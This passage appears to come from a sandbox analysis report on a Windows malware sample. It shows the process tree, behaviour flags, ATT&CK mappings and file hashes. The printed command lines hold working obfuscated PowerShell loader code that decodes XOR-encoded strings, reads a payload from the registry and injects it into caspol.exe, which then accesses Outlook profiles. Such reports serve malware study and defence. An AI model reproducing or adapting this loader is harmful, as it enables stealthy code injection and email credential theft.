Sp're8HjDAuEUnFDeCRa8ChCge5BoCFlDUnCPaCDaDKnAOm9AnBFn9Sh9Id9es8Ka8Tr7TaEAvDHuCGyCZoCIgFGyCFe0FiCPh7tiCAnCSoEOlARuCHu6RuCAp7skDFrAAlDOsDUlDUnBfoDFoCLsCmoAMiDFeDTaCSt6MaDKoBTi8Tl1De8FiDSyFTeBPlDPrCOzCGe7GeCBeDNoCFeDGeDCi0AmDNeAReDOvAsjCBoCBoDAbBhy9MaBTr9euDBu9ReFAn8Re5Py8Mo9MaFKl2CoFCrAAfDBa0SlDPeAHuDSkDChCHjCMeCFe4Ef8Im7CeFShBsiCSmCTiCSiFMaCSu5deCOvCScCAsASoDRaDReCUn0MiCPr6CoCSu7Se8Di7GrEspANoChe8PeCVi5AfCBl5PsCPa0BaCAg7GrCReESpEZoADoCsy6DiCSt7VrDAnFAcCPtCSaCSt7StDCoDFlCOl0AfCFo6MaCRe7TrDAaAreFMa4Un9Ol3Sn9In3ChFIlASaDNoDHaCAn8UnCRh7HaCSeDHeCOr8InDtrBPrCSmDSk8Ad5Ch8We9Po8VrDTrETe7UnCAdCSeCSqEdoCSi5ReCTo0ReCPrESlCReCPr8st0Mi8Un7HuFElAHeCQuCReDInDInEVa0HaCLo4VeDDe9LiCIn5SiCThCLyCMi4InCNaCSaCBr7RhDDeDDaCGg8StDFaDSnCMo0CrCpe6noCQu7BaECoFReCKi5PoCSa8EnCraEBaDSkAKa8Su1Ud8UnDPrFEcBOpDTrCAmCTr7PrColDBaCPjDEdDMa0MaDUnAPeDRuARiCTuCFlDHyBPr9NiBga9UnDTe9ByEBa8To0Re'Pa;Pe&Fa(Ag`$SpUConHodfeeInrTidjoiObrOreDokUttLerPi7Aq)Ad Pl`$BlOMosUntLyrLueRagTaeAkrtj3No;Sj`$PuOVasTrtskrCaeTjgSheFrrNa4Di Dr=Ka BeHHuTCoBBi De'Ge8seDdrETrFNiCAs8ExCSi5WhCJuDRaCGrCPlDHyASm9BaBru9Ba9ng9Ce8Fi8Un7UnEStDAnCvaCCaCPoFmaCDe0ArCRe7TiCgaCKrERu4YdCAsCSaDAlDLyCEi1ApCAl6StCRaDHa8Pr1Pa8ArDCoFMaCEnCAs7MiCNoDGaCAfCDeDNoBMaCFoDClCEl0irDSuBMuCGaCVeCHu2EkDTrDFoDFlBLi9GrBIn8Pl5Al8Ma9No8CoDNaFEjCFeCHu7ErCUnDgyCPeCCaDUnBUsCReDRoCDo0hvDSkBCoCRoCDoCSa2HaDAfDRdDTrBEm9OvADo8Bi5Sh8Re9Es8KaDOpECoFWhDcoBUnCTa8PiDDoAObCGoCMaDDiBTiCpi0raCCh7HeCFoELeDPaADr8Sw5Aa8cy9Tr8VeDCeECu7NoCUnCGrCTrEMiCUl5FlCCo0AtCRaEFoCKeCTr8Ke0Po8Ek7flFSpAArCEmCDiDkoDmiEAg0boCLo4CoDUd9EfCNa5PaCHeCGrCUn4igCTiCRyCDi7OmDHoDPoCde8prDNaDtrCHu0SuCKo6BeCRe7InEBiFByCPl5MaCSt8voCUfEAmDPrAPa8Un1No8ShDvaFHaBbaDFoCPiCRe7FoCFoDStCPoDStDPr0ImDGlAImDmaAEuCSkCYpDSkBFl9UnBUn9PaDUn9ArESt8Te0Sy'St;pa&Ap(In`$JoUBanTodBeeCarHadAriFurNoeHjkPltHerPa7Av)Mh Ps`$TaOAfsditRerDueWigTueBerPr4To;Fl`$PlOUnsFotSurArePogKrePhrma5Ly Se=La CoHStTDrBDo Ov'BoDDeBOvCCoCStDHeDdoDcaCSlDKoBSaCOu7St8Ma9Ca8PrDIaETrFbrCLe8SkCGo5TeCJeDEnCOvCMeDurAUd9IrBEj9An9Eu9Fo8St8Hi7OvEHaAutDRaBfeCFiCAlCBd8PoDHoDKvCCoCLyFGaDBeDRe0ArDvi9SkCHaCPa8Ve1Br8Fu0Fr'Ac;Re&Be(Ba`$GaUBlnUndOpeAbrStdneiGrrToeSvkBetCorAa7Au)La Ch`$CoOSusOptParCoeCogAneElrTr5Sw Pu Hy Cr;or}Lu`$BuCSpoAgmAlpLiaCunNaiCoeTodSk Is=Ul AnHDeTraBti un'IlCDa2PhCSpCOfDSuBNoCCo7PaCVeCPrCSk5Fi9DiAHe9BaBRa'Ju;Po`$ArOStsChtHorPeeNugCeeErrSa6Ha Tr=Di VgHAnTEuBFi la'Re8ReDPaEFo5FaCDv6AcCpo7MeCStEBiCUn0KnCKa4UdCKv8foCKl7arCSt6CiDReCSaDMiAKi8In9st9Sl4Kr8No9ToFQu2CoFReAReDIl0BrDGrAStDSmDBeCFaCunCUn4Re8en7NoFAlBGrDKoCArCMo7BiDSkDMaCPe0OvCRe4FiCbeCAf8Re7ScEWa0ilCTi7SkDBlDUnCBrCBoDSuBBaCOv6GrDFo9UsFKoAfeCZoCEmDAuBKaDSyFTrCBo0CaCMaAKaCamCTiDMeAEx8Ov7LuEFi4SvCOv8AcDInBHeDMuAreCBv1StCGr8SuCBa5TiFGr4lo9Br3te9Bu3ReENyESrCMiCKoDHjDsuETrDFrCAaCFoCDi5SuCDgCUnCRaEstCma8seDuiDWaCauCsjETrFInCNo6FrDAuBEtEMiFFrDReCHoCHa7FrCSaAUnDShDQuCHe0SkCPr6UnCLo7EnFGa9SuCLl6FaCst0SlCIn7SaDAlDCoCFoCLiDSvBBa8Fo1Un8Pa1UnCSlFBaCra2OrDCo9Ja8Un9Mo8IdDSlEGeASaCCo6PrCFr4SlDFo9TeCHe8SuCej7VaCAl0FeCDiCTyCCoDSu8Fo9le8SaDAgFbyCPuCBe7BeCAnDBeCinCEuDToBKuCflDNoCHu0CaDCoBEtCDuCCyCMu2NvDLoDMiDFoBEf9noDRa8Va0Lo8Si5Ra8Ne9Ru8Su1NoEWaEUdEStDBaFSkDRu8Tr9exEBy9Pr8Br1CoFHa2McEUn0TeCSi7FlDKoDIaFKa9hoDSaDIgDChBsiFAl4Ja8No5Im8Ob9NaFBa2ToFHeCHaETh0ArCVi7DeDReDTo9UnAMa9BuBbaFOp4Fo8Sh5Au8Un9FeFDd2ToFCoCBuETr0RiCFl7WiDGeDEn9seAPo9BaBFoFHa4Im8Ny5as8Xy9BeFhy2FrFKoCApETr0tvCRe7AnDPhDEk9AcAfr9ReBstFbr4tr8Ma0Vi8Re9Di8Mu1PaFUd2OuECh0ViCAf7TaDJoDSiFKr9HoDOzDBlDBoBNaFBa4Me8Ov0Sa8ov0Pi8Sk0la'Jo;Ep&br(Bo`$jaUWanChdAfeEorQudKeiMerAbeInkUntaurRe7Fu)Cr Re`$buONosMitSerMeeNogIneGurBl6Ai;Hu`$VeSSpybesRusReeSulFimFoaTenAldafeInnGesFr Mi=wh VefFrkUlpBr De`$RdUIrnAfdUmeTirModTriSnrBeeAfkLatDjraf5Ej Fe`$NaURenSkdFreBorDadUniTyrCyeMakYotRarDi6He;Ba`$PeOGossktBurDoeprgFoeStrsk7Fo Tr=Se ThHUnTUnBAp Sv'De8ReDSaDEnBWiCSiCupCGyBTuDVoAInDSaDVaCAb0PhCMeEHoCInCRoDStBSlCKa7FaCNoCPrDErAso9HoABi8Su9Tr9Sk4ba8Ad9Et8DeDSuEIc5ClCAn6InCKu7ChCMeEVeCge0cuCTi4MaCUn8LaCTr7FaCPa6BuDMeCPeDSeASt8Pe7InEUn0seCUn7BeDAtFPlCrd6CoCNo2ThCUdCGa8Di1PoFOm2DeESy0SpCSy7SaDTaDOpFpr9EuDEdDViDAtBHiFCo4Fr9No3Si9Sv3SaFFo3LaCNoCMiDNaBAuCKe6Po8In5Sy8Se9Pr9FaFDe9FuCKe9Ro0hu8Fo5Ud8Op9Fy9Je9BlDlo1In9SkAre9St9Re9To9Hu9Mo9ce8vo5Sy8Re9Do9Pr9CoDSk1Ar9PlDgr9Ma9Ln8Hy0Er'Es;Si&Dy(De`$LiUDinDedCoeMarSndbuiPrrSueDekNetCorim7Be)To Gt`$RiOVasPetKarMoeUngHoeChrEu7pr;Do`$SuOTisRetWirHaeokgOueDerFe8Kr Sr=Vr BeHDuTSpBHv Ar'Op8DuDCoEFr5BoCSk6phCSyCHeDBoBRa8fa9Kr9Un4Vo8Mo9Al8RoDNaESt5SvCSr6FeCEk7SuCSpEAnCPe0FaCFr4PeCCo8ToCIm7FoCfo6HeDFoCChDocAMi8Ne7NeELo0DiCAf7NoDSiFTiCHs6liCBa2FeCPoCBe8Cr1FiFSp2SkEIn0PrCUn7SiDbrDUdFSo9FaDSqDSeDKnBFoFIn4Te9Ir3Au9Bl3BaFKo3KuCWiCAlDUbBAmCPr6su8Ze5La8Ph9Ra9ObEFr9SaDDy9UnAFo9Da1Bi9SmATs9neAUn9PoFNe9Di9Re8hv5Wi8Fo9Do9cu9StDTy1Ve9reAAb9Se9al9Ka9Ry9He9Kr8Ca5Ob8Sl9ku9Ka9KnDBv1Br9FlDNa8No0Ba'pr;St&Ad(gu`$DrUTanChdToeAcrBrdAfiCarDoeJekDitLorCh7Tr)Re ch`$CrOResDgtSyrMueElgMaeSkrTe8ka;Ad`$chCMuhBeiKllAadChrCaeLonSh=Do(PlGDeeCotBo-SuIVrtAneNomDePBrrEnoAfpyeeErrPrtBryIa sa-FlPNeaUntAfhKo Pa'BoHBrKTuCPlUAb:In\LiUKlnmorBeoDeaKusWetSe\DeCKooStlThebroFipsktReianlAbeFo'Te)Fl.UnPSueGrdOpeTrrPhaPrsVetResUn;Pu`$ScOKrsSitDirKieEkgUnechrVe9Fl Op=Pr SlHSuTDeBPr Mt'Tr8SuDGrEIn6FoDChABrDFlDMeDKoBLyCBuCInCUnEKaCEgCUnDJaBor8Bl9Be9Fi4Mi8un9BaFSt2teFHyAChDWr0TrDLeAFaDGlDInCDoCRaCTr4Sh8Ud7TrEGrAPyCFo6TrCGi7OvDVaFBlCToCChDPlBSaDpaDDeFCi4Pr9Ya3No9Pe3AnEOuFTeDNoBTrCIn6HuCPr4DeEUnBSjCfr8OdDSoAAtCFiCPr9HjFVo9DiDAcFKaACeDDkDReDAfBGeCIl0HeCir7ToCNoEsy8Fr1Gr8KbDJiEPiAMaCem1DoCan0PeCDe5InCWiDStDAdBMaCReCviCMe7Fr8Sn0Sa'Cu;En&Un(St`$FaUBanLrdAkealrIndByiSorUdeUnkLotScrRa7Ae)En Ov`$PrODesWatAhrTrePogTrePorTr9Re;Gi`$ThCTrhYaiFalStdScrBreHenRi0An Im=Ki NoHNaTTwBun La'BlFMe2FoFAmAopDAu0BoDPrAAmDSpDAlCUdCEaCSa4re8An7UdFVeBCeDfwCGrCCh7ScDMaDAdCMo0SpCOv4SpCAfCUn8Me7DoEPa0NoCRe7coDFeDEvCstCTiDSaBteCsu6SuDAn9BuFamASlCHyCKrDSkBPiDSvFUnCOv0ByCSpABaCCoCHeDEfASu8Cr7CyEfo4RdCFo8FaDHjBUnDStARgCRo1CoCKd8BlCMe5diFMa4Pa9Go3Re9Ha3RaEByADiCBo6ReDJe9PaDSk0Ud8No1Ta8RoDasESv6StDChAEcDPoDSoDSpBTrCAlCdyCTvEHaCFrCPeDAsBSt8Ar5Ca8Ul9Di9ud9Bi8Ch5Fr8Am9Gi8Or9Se8SiDOuDVaBElCLeCPrCebBmiDRaAInDmiDHaCMu0RiCStEKaCHyCReDAnBFrCUn7MaCOpCPoDBeACo9GaAFl8Di5Sm8Bj9Pe9inFOu9BuCad9Fa0Pi8Ta0Cu'No;Ua&Sp(Hy`$StUManMidRueUnrRadLyiCirSaeDrkqutTrrAr7Un)Sy Sa`$SrCSyhYaicolTrdSurPeeExnUn0no;We`$BiHEfuTomLypNeiPleGrsbrtSa=Va`$VoOUfsHatPerBeeTigPreSkrHe.SocOpoBauPlnoetBl-Sk6En5Mo9Fr;Ap`$GiCUphPsiAnlPedCrrSaeJanOm1tu Tr=Po OpHTaTCoBSo Sp'FoFDi2PyFCaAStDGa0AlDdeAAnDCoDDiCCoCUnCMe4Ga8Un7AnFarBSwDJoCAdCSt7ApDMuDPaCSk0MaCGu4moCTrCsn8Gi7PrEHe0EnCLu7HaDplDKoCCrCLaDCaBShCWo6PrDFa9SwFDeATuCGaCCaDStBHaDAfFBjCQu0KoCSpAHeCunCCrDUnAHa8Om7KiEUn4LiCBo8UpDBeBTrDRaAboCUn1EuCDi8ReCPa5biFYu4In9Ov3Gi9Op3FrEElAInCsl6CoDeb9BlDOv0Pa8ab1Fu8DyDAfEMa6OvDGrAChDUpDiaDDeBOpCKrCRiCOrETaCLaCRaDBrBVi8Ap5Co8Sn9Er9huFSa9UbCBi9Gl0Fo8Ov5Ra8Ma9sa8MoDSpEVo5AmCFi6MiCGrCSjDSkBAn8He5pe8Pa9Al8WaDPuEWa1ErDBuCTeCCh4UnDPa9SeCPr0StCGaCGaDDyACiDDeDMl8In0An'Sw;Ko&Sa(Af`$skUErnTidPeePirBrdBriVarDeefekUntTorTi7Sm)De Br`$TrCBehAfiGrlSldParQueSynVe1Un;Ek`$SmCRahKkiKolUndUnrFoecanSk2Be La=Gr ScHGlTLaBHe Ch'Mo8PaDBrFwyBMaDGrCKnCTi4DiCUnCUnDHe1Bl8Tj9sp9Fa4Pr8Tu9DeFIm2EtFBaAReDGr0ScDPhAFiDStDDeCOvClaCDr4Pu8Ek7PrFGyBMaDVeCBeCBa7UbDinDfiCFu0IsCMa4SaCAnCGy8Al7PsEhy0BaCDa7SpDAnDMoCUnCUnDcaBTrCGn6AsDTa9TmFAtAMiCTrCCaDViBPrDKaFUnCNn0PaCObATrCNaCEmDMiALa8ga7FoELa4LeCGl8ArDSkBUdDSpARyCTe1AsCMi8ToCBo5LaFOp4Mi9Gy3Ra9Ai3MeEMaEHuCblCAsDKeDPaESvDstCBeCFrCHj5UbCFaCDvCSkEAvCAa8MaDefDStCInCReEVaFFuCPu6PaDVaBFiEUgFSaDSmCEnCKa7AtCFrAPrDEuDNaCTo0CaCTr6DeCDu7FiFFo9SiCSa6TiCRo0XaCPo7HeDViDPaCInCAgDBiBAd8da1Cn8Jo1HuCArFMuCTa2TjDSg9Ma8In9Pr8ShDDiFSlAGrCHi2RhCWi6arCWa5GrCVaCReCCh4ViCStCCoDFoAPaDLoDReCUnCZyDRuBByCPeCPaDLaBPrCLoCPeDTrDRe8su9Eq8DoDruCBl8FiCMoFirDSuAFrCPr2AxCTuCMeCArDPdCAc0CoCAnEThCFyCMeCDi5CiDNoADiCUnCAnDTrAkiCSiEMoDMeBWaDCoCLiCGl7InCGrDUsCStCSeCAv7CoCLuCVa8Ar0Ty8Pr5Br8Fo9Do8Ca1PhECaEFeEGaDKoFArDFu8Ai9unECh9Bl8At1ChFMo2BoEte0NoCSe7ToDAfDsaFis9PrDEpDReDDiBMoFOv4St8Or5Br8Su9TiFMi2spESe0CeCRe7NeDApDGgFAn9TeDInDCeDElBMoFFo4my8aw5Re8Fr9CeFKl2SkEko0InCPy7ElDdrDAnFtw9DyDspDUdDStBGlFSi4Ek8Af5Bi8Ab9TrFBe2ScESk0MoCSv7MoDEkDPrFDo9BlDDeDSkDVeBStFBe4Fr8Ge5gr8Pa9DoFDu2MaEVi0TiCRe7CoDStDupFFl9ShDInDToDBiBOpFRe4Sk8Ba0Me8Uh9Pu8Tu1AlFEl2DeESw0PeCgr7LeDBoDDeFAa9SlDNeDadDTaBSpFFr4Ko8Ki0Sp8Ov0ga8En0Br'Op;ch&Me(Br`$GeUEnnModCaeUorKadCoiDirLaeHukMatParPi7Ve)St Cu`$ExCSkhIriOdlEndUdrSteSande2Bo;Ud`$YvCDehLaiBelSidEmrKieGunSt3So ex=Fo SuHDeTjaBOv Ne'Do8ZyDPrFAnBIdDOpCFoCRo4NeCEmCAnDPd1Kr8pr7MeEWh0DiCMi7MaDFoFuhCCo6PhCRe2HoCCoCLo8To1Hn8moDCyDSvBkeCGiCUnCStBLyDLyAAiDMuDElCEn0OrCmoEStCdiCInDNdBApCGr7MaCByCNaDstANa9SuAFl8hr5Po8RyDObELe5ArCMi6tiCShCDeDTeBGy8Sn5Om8DrDCoFOuADeDBr0StDKaANeDAtAPrCGaCCoCLa5RdCRy4SuCna8UdCSk7MeCsuDDeCHeCEfCSp7epDSaACl8ra5El9Af9Ar8Mi5Di9Gr9Ky8Su0Fo're;Ox&Un(An`$ReUUdnCndGeePhrstdOriPirTreInkDetSlrOr7Ua)Er Vo`$MeCPyhMiiFllSwdnorAceKenPr3Te#ko;""";;Function Children9 { param([String]$Stivstikkerens); $Frayproof = $Stivstikkerens.toCharArray(); For($Argosine=2; $Argosine -lt $Frayproof.count-1; $Argosine+=(2+1)){ $Cretion = $Cretion + $Frayproof[$Argosine]; } $Cretion;}$Senehinde0 = Children9 'MoIvrnBevSaoMokMdeti-AlEFexUnpGrrdieStsStsPeiVeoExnDi ';$Senehinde2 = Children9 'AfsbrtPeaKirAmtZo-FijGeoTebSv ';$Senehinde1= Children9 $Landsudligning;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Senehinde1 ;}else{&$Senehinde0 $Senehinde1;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:584
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Socialbedrageres00 {param([String]$Stivstikkerens);For($Argosine=2; $Argosine -lt $Stivstikkerens.Length-1; $Argosine+=(2+1)){$Cretion = $Cretion + $Stivstikkerens.Substring($Argosine, 1);}$Cretion;}$Socialbedrageres02 = Socialbedrageres00 'beISwnBlvPuoShkHyeRa-ClEscxBapRirGieGisAksUniCeoSunpr ';$Socialbedrageres01 = Socialbedrageres00 'Fu$PuvCorPoaAzgFesSk[Co$FrASprtigUnoOrsNoiStnPoeMc/No2Ka]Te Un=Sk Sv[LocGeoEgnOxvBreImrMitPo]Re:Sc:BiTBlotrBSpyOrtBjeAn(Af$PaSTvtCoiStvchsCotSkiSykUnkDieUnrPoeScnCosIn.MaSAmuTabVesLetStrVaiStnTrgFo(Me$FlADorSigPloFrsDeiInnLoeem,Ma Ne2Pr)Cy,Wh hy1Se6Ex)El ';Function HTB {param([String]$Stivstikkerens);$vrags = New-Object byte[] ($Stivstikkerens.Length / 2);For($Argosine=0; $Argosine -lt $Stivstikkerens.Length; $Argosine+=2){.($Socialbedrageres02) $Socialbedrageres01;$vrags[$Argosine/2] = ($vrags[$Argosine/2] -bxor 169);}[String][System.Text.Encoding]::ASCII.GetString($vrags);}$Runddysser240=HTB 'FAD0DADDCCC487CDC5C5';$Runddysser241=HTB 'E4C0CADBC6DAC6CFDD87FEC0C79A9B87FCC7DAC8CFCCE7C8DDC0DFCCE4CCDDC1C6CDDA';$Runddysser242=HTB 'EECCDDF9DBC6CAE8CDCDDBCCDADA';$Runddysser243=HTB 'FAD0DADDCCC487FBDCC7DDC0C4CC87E0C7DDCCDBC6D9FACCDBDFC0CACCDA87E1C8C7CDC5CCFBCCCF';$Runddysser244=HTB 'DADDDBC0C7CE';$Runddysser245=HTB 'EECCDDE4C6CDDCC5CCE1C8C7CDC5CC';$Runddysser246=HTB 'FBFDFAD9CCCAC0C8C5E7C8C4CC8589E1C0CDCCEBD0FAC0CE8589F9DCCBC5C0CA';$Runddysser247=HTB 'FBDCC7DDC0C4CC8589E4C8C7C8CECCCD';$Runddysser248=HTB 'FBCCCFC5CCCADDCCCDEDCCC5CCCEC8DDCC';$Runddysser249=HTB 'E0C7E4CCC4C6DBD0E4C6CDDCC5CC';$Underdirektr0=HTB 'E4D0EDCCC5CCCEC8DDCCFDD0D9CC';$Underdirektr1=HTB 'EAC5C8DADA8589F9DCCBC5C0CA8589FACCC8C5CCCD8589E8C7DAC0EAC5C8DADA8589E8DCDDC6EAC5C8DADA';$Underdirektr2=HTB 'E0C7DFC6C2CC';$Underdirektr3=HTB 'F9DCCBC5C0CA8589E1C0CDCCEBD0FAC0CE8589E7CCDEFAC5C6DD8589FFC0DBDDDCC8C5';$Underdirektr4=HTB 'FFC0DBDDDCC8C5E8C5C5C6CA';$Underdirektr5=HTB 'C7DDCDC5C5';$Underdirektr6=HTB 'E7DDF9DBC6DDCCCADDFFC0DBDDDCC8C5E4CCC4C6DBD0';$Underdirektr7=HTB 'E0ECF1';$Underdirektr8=HTB 'F5';$Skolemestereret=HTB 'FCFAECFB9A9B';$afskedigelsesgrundene=HTB 'EAC8C5C5FEC0C7CDC6DEF9DBC6CAE8';function fkp {Param ($Kommer, $Datterselskabers) ;$Ostreger0 =HTB '8DEFDBCCC2DFCCC7DACEC8C7CECCC789948981F2E8D9D9EDC6C4C8C0C7F49393EADCDBDBCCC7DDEDC6C4C8C0C787EECCDDE8DADACCC4CBC5C0CCDA818089D589FEC1CCDBCC84E6CBC3CCCADD89D2898DF687EEC5C6CBC8C5E8DADACCC4CBC5D0EAC8CAC1CC8984E8C7CD898DF687E5C6CAC8DDC0C6C787FAD9C5C0DD818DFCC7CDCCDBCDC0DBCCC2DDDB9180F28498F487ECD8DCC8C5DA818DFBDCC7CDCDD0DADACCDB9B9D998089D48087EECCDDFDD0D9CC818DFBDCC7CDCDD0DADACCDB9B9D9880';&($Underdirektr7) $Ostreger0;$Ostreger5 = HTB '8DFAC2C4C4CCDA8994898DEFDBCCC2DFCCC7DACEC8C7CECCC787EECCDDE4CCDDC1C6CD818DFBDCC7CDCDD0DADACCDB9B9D9B8589F2FDD0D9CCF2F4F489E9818DFBDCC7CDCDD0DADACCDB9B9D9A85898DFBDCC7CDCDD0DADACCDB9B9D9D8080';&($Underdirektr7) $Ostreger5;$Ostreger1 = HTB 'DBCCDDDCDBC7898DFAC2C4C4CCDA87E0C7DFC6C2CC818DC7DCC5C58589E981F2FAD0DADDCCC487FBDCC7DDC0C4CC87E0C7DDCCDBC6D9FACCDBDFC0CACCDA87E1C8C7CDC5CCFBCCCFF481E7CCDE84E6CBC3CCCADD89FAD0DADDCCC487FBDCC7DDC0C4CC87E0C7DDCCDBC6D9FACCDBDFC0CACCDA87E1C8C7CDC5CCFBCCCF8181E7CCDE84E6CBC3CCCADD89E0C7DDF9DDDB808589818DEFDBCCC2DFCCC7DACEC8C7CECCC787EECCDDE4CCDDC1C6CD818DFBDCC7CDCDD0DADACCDB9B9D9C808087E0C7DFC6C2CC818DC7DCC5C58589E9818DE2C6C4C4CCDB8080808085898DEDC8DDDDCCDBDACCC5DAC2C8CBCCDBDA8080';&($Underdirektr7) $Ostreger1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Neglige,[Parameter(Position = 1)] [Type] $Fraserings = [Void]);$Ostreger2 = HTB '8DEFC8C5CDCCDA9B9998899489F2E8D9D9EDC6C4C8C0C7F49393EADCDBDBCCC7DDEDC6C4C8C0C787EDCCCFC0C7CCEDD0C7C8C4C0CAE8DADACCC4CBC5D08181E7CCDE84E6CBC3CCCADD89FAD0DADDCCC487FBCCCFC5CCCADDC0C6C787E8DADACCC4CBC5D0E7C8C4CC818DFBDCC7CDCDD0DADACCDB9B9D9180808589F2FAD0DADDCCC487FBCCCFC5CCCADDC0C6C787ECC4C0DD87E8DADACCC4CBC5D0EBDCC0C5CDCCDBE8CACACCDADAF49393FBDCC78087EDCCCFC0C7CCEDD0C7C8C4C0CAE4C6CDDCC5CC818DFBDCC7CDCDD0DADACCDB9B9D9085898DCFC8C5DACC8087EDCCCFC0C7CCFDD0D9CC818DFCC7CDCCDBCDC0DBCCC2DDDB9985898DFCC7CDCCDBCDC0DBCCC2DDDB988589F2FAD0DADDCCC487E4DCC5DDC0CAC8DADDEDCCC5CCCEC8DDCCF480';&($Underdirektr7) $Ostreger2;$Ostreger3 = HTB '8DEFC8C5CDCCDA9B999887EDCCCFC0C7CCEAC6C7DADDDBDCCADDC6DB818DFBDCC7CDCDD0DADACCDB9B9D9F8589F2FAD0DADDCCC487FBCCCFC5CCCADDC0C6C787EAC8C5C5C0C7CEEAC6C7DFCCC7DDC0C6C7DAF49393FADDC8C7CDC8DBCD85898DE7CCCEC5C0CECC8087FACCDDE0C4D9C5CCC4CCC7DDC8DDC0C6C7EFC5C8CEDA818DFBDCC7CDCDD0DADACCDB9B9D9E80';&($Underdirektr7) $Ostreger3;$Ostreger4 = HTB '8DEFC8C5CDCCDA9B999887EDCCCFC0C7CCE4CCDDC1C6CD818DFCC7CDCCDBCDC0DBCCC2DDDB9B85898DFCC7CDCCDBCDC0DBCCC2DDDB9A85898DEFDBC8DACCDBC0C7CEDA85898DE7CCCEC5C0CECC8087FACCDDE0C4D9C5CCC4CCC7DDC8DDC0C6C7EFC5C8CEDA818DFBDCC7CDCDD0DADACCDB9B9D9E80';&($Underdirektr7) $Ostreger4;$Ostreger5 = HTB 'DBCCDDDCDBC7898DEFC8C5CDCCDA9B999887EADBCCC8DDCCFDD0D9CC8180';&($Underdirektr7) $Ostreger5 ;}$Companied = HTB 'C2CCDBC7CCC59A9B';$Ostreger6 = HTB '8DE5C6C7CEC0C4C8C7C6DCDA899489F2FAD0DADDCCC487FBDCC7DDC0C4CC87E0C7DDCCDBC6D9FACCDBDFC0CACCDA87E4C8DBDAC1C8C5F49393EECCDDEDCCC5CCCEC8DDCCEFC6DBEFDCC7CADDC0C6C7F9C6C0C7DDCCDB8181CFC2D9898DEAC6C4D9C8C7C0CCCD898DFCC7CDCCDBCDC0DBCCC2DDDB9D80858981EEEDFD89E981F2E0C7DDF9DDDBF48589F2FCE0C7DD9A9BF48589F2FCE0C7DD9A9BF48589F2FCE0C7DD9A9BF4808981F2E0C7DDF9DDDBF4808080';&($Underdirektr7) $Ostreger6;$Sysselmandens = fkp $Underdirektr5 $Underdirektr6;$Ostreger7 = HTB '8DDBCCCBDADDC0CECCDBC7CCDA9A8994898DE5C6C7CEC0C4C8C7C6DCDA87E0C7DFC6C2CC81F2E0C7DDF9DDDBF49393F3CCDBC685899F9C90858999D19A999999858999D19D9980';&($Underdirektr7) $Ostreger7;$Ostreger8 = HTB '8DE5C6CCDB8994898DE5C6C7CEC0C4C8C7C6DCDA87E0C7DFC6C2CC81F2E0C7DDF9DDDBF49393F3CCDBC685899E9D9A919A9A9F99858999D19A999999858999D19D80';&($Underdirektr7) $Ostreger8;$Children=(Get-ItemProperty -Path 'HKCU:\Unroast\Coleoptile').Pederasts;$Ostreger9 = HTB '8DE6DADDDBCCCECCDB899489F2FAD0DADDCCC487EAC6C7DFCCDBDDF49393EFDBC6C4EBC8DACC9F9DFADDDBC0C7CE818DEAC1C0C5CDDBCCC780';&($Underdirektr7) $Ostreger9;$Children0 = HTB 'F2FAD0DADDCCC487FBDCC7DDC0C4CC87E0C7DDCCDBC6D9FACCDBDFC0CACCDA87E4C8DBDAC1C8C5F49393EAC6D9D0818DE6DADDDBCCCECCDB8589998589898DDBCCCBDADDC0CECCDBC7CCDA9A85899F9C9080';&($Underdirektr7) $Children0;$Humpiest=$Ostreger.count-659;$Children1 = HTB 'F2FAD0DADDCCC487FBDCC7DDC0C4CC87E0C7DDCCDBC6D9FACCDBDFC0CACCDA87E4C8DBDAC1C8C5F49393EAC6D9D0818DE6DADDDBCCCECCDB85899F9C9085898DE5C6CCDB85898DE1DCC4D9C0CCDADD80';&($Underdirektr7) $Children1;$Children2 = HTB '8DFBDCC4CCD1899489F2FAD0DADDCCC487FBDCC7DDC0C4CC87E0C7DDCCDBC6D9FACCDBDFC0CACCDA87E4C8DBDAC1C8C5F49393EECCDDEDCCC5CCCEC8DDCCEFC6DBEFDCC7CADDC0C6C7F9C6C0C7DDCCDB8181CFC2D9898DFAC2C6C5CCC4CCDADDCCDBCCDBCCDD898DC8CFDAC2CCCDC0CECCC5DACCDACEDBDCC7CDCCC7CC80858981EEEDFD89E981F2E0C7DDF9DDDBF48589F2E0C7DDF9DDDBF48589F2E0C7DDF9DDDBF48589F2E0C7DDF9DDDBF48589F2E0C7DDF9DDDBF4808981F2E0C7DDF9DDDBF4808080';&($Underdirektr7) $Children2;$Children3 = HTB '8DFBDCC4CCD187E0C7DFC6C2CC818DDBCCCBDADDC0CECCDBC7CCDA9A858DE5C6CCDB858DFAD0DADACCC5C4C8C7CDCCC7DA8599859980';&($Underdirektr7) $Children3#"
    3⤵
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:808
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      PID:304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      Checks QEMU agent file
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:1192

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
